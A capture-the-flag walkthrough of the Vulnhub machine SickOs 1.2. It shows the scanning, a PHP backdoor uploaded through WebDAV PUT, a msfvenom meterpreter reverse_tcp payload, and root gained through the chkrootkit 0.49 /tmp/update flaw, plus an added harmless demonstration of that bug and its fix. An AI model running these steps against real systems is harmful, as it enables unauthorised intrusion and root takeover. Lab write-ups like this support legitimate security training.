SickOs 1.2

SickOs 1.2 - Vulnhub

First, Nmap was run to scan for open ports and running service versions.

nmap -sV

Starting Nmap 7.30 ( ) at 2016-10-14 11:29 MDT
Nmap scan report for
Host is up (0.00059s latency).
Not shown: 998 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:09:A5:6D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds

Next, dirb was run to scan for directories on the web service running on port 80. The “test” directory was discovered.

dirb /usr/share/wordlists/dirb/big.txt

DIRB v2.22
By The Dark Raver

START_TIME: Fri Oct 14 14:39:53 2016
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

GENERATED WORDS: 20458

---- Scanning URL: ----
==> DIRECTORY:
+ (CODE:403|SIZE:345)
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
END_TIME: Fri Oct 14 14:40:13 2016

Curl was used to check the allowed HTTP methods by sending an OPTIONS request. The response for the test directory carries a DAV: 1,2 header, meaning the directory is served over WebDAV, and we found we have permission to use the PUT method to upload files to the server.

curl -v -X OPTIONS
*   Trying
* Connected to ( port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host:
> User-Agent: curl/7.50.1
> Accept: */*
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Location:
< Content-Length: 0
< Date: Fri, 14 Oct 2016 20:38:46 GMT
< Server: lighttpd/1.4.28
* Connection #0 to host left intact

Using curl, I was able to upload a PHP backdoor to the server.

cp /usr/share/webshells/php/php-backdoor.php bd.php
curl -T bd.php -0

Next, to get a reverse shell, I generated an ELF payload and executed it through the PHP backdoor.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost= lport=443 -f elf -o payload
curl -T payload -0

Looking at the installed software, we can see that chkrootkit 0.49 is installed. Searching exploit-db shows that this version is vulnerable to a local privilege escalation.

dpkg -l
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name           Version        Description
rc  chkrootkit     0.49-4ubuntu1. rootkit detector

searchsploit chkrootkit 0.49
---------------------------------------------------------------------- ----------------------------------
Exploit Title                                                         | Path
---------------------------------------------------------------------- ----------------------------------
Chkrootkit 0.49 - Privilege Escalation                                | /linux/local/33899.txt
---------------------------------------------------------------------- ----------------------------------

The exploit-db entry below explains that this vulnerability is exploited by placing an executable file named ‘update’ in ‘/tmp’.

cat /usr/share/exploitdb/platforms/linux/local/33899.txt

Steps to reproduce:

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
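The root cause behind that advisory, as an added example that is neither from this writeup nor from chkrootkit itself: the 0.49 slapper() check collected suspicious paths (among them /tmp/update) with an unquoted shell assignment, and the block below replays that pattern in a scratch directory standing in for /tmp, next to the quoted form that 0.50 adopted. The scratch directory, the marker file and the harmless stand-in "update" script are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the writeup or from chkrootkit. In 0.49 the
# slapper() check built its list of suspicious paths with
#     file_port=$file_port $i
# The shell parses that as "run the command $i with file_port set in its
# environment", so whatever sits at /tmp/update runs with chkrootkit's uid,
# normally root when it is started from cron.daily. 0.50 quoted the value.

# Scratch stand-in for /tmp (constructed). Kept under $PWD rather than /tmp so
# the demo is not defeated by a noexec /tmp, which is exactly the mitigation
# the advisory mentions.
SCRATCH=$(mktemp -d "$PWD/chkrootkit-demo.XXXXXX")
MARKER="$SCRATCH/ran"          # created only if the planted file executes

# Harmless stand-in for the planted "update": it just leaves the marker.
cat > "$SCRATCH/update" <<EOF
#!/bin/sh
touch "$MARKER"
EOF
chmod +x "$SCRATCH/update"

# The 0.49 pattern. Returns 0 (true) if the planted file was executed.
vulnerable_slapper() {
    rm -f "$MARKER"
    file_port=
    for i in "$SCRATCH/update"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i    # unquoted: $i becomes the command
        fi
    done
    [ -e "$MARKER" ]
}

# The 0.50 pattern: quoted, the right-hand side is one word, so the line is
# a plain assignment and nothing is executed.
fixed_slapper() {
    rm -f "$MARKER"
    file_port=
    for i in "$SCRATCH/update"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    [ -e "$MARKER" ]
}

if vulnerable_slapper; then echo "0.49 pattern: planted file was executed"; fi
if fixed_slapper; then echo "0.50 pattern: planted file was executed"
else echo "0.50 pattern: nothing executed"; fi
```

Mounting /tmp noexec blocks the planted file from running at all, which is why the advisory calls it out; removing the scratch directory afterwards is left to the reader.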

The ELF payload generated earlier was then copied to /tmp/update.

cp /var/www/test/payload2 /tmp/update   # chkrootkit executes /tmp/update as root

Finally, the reverse shell connects back to us, and we are able to read the proof file.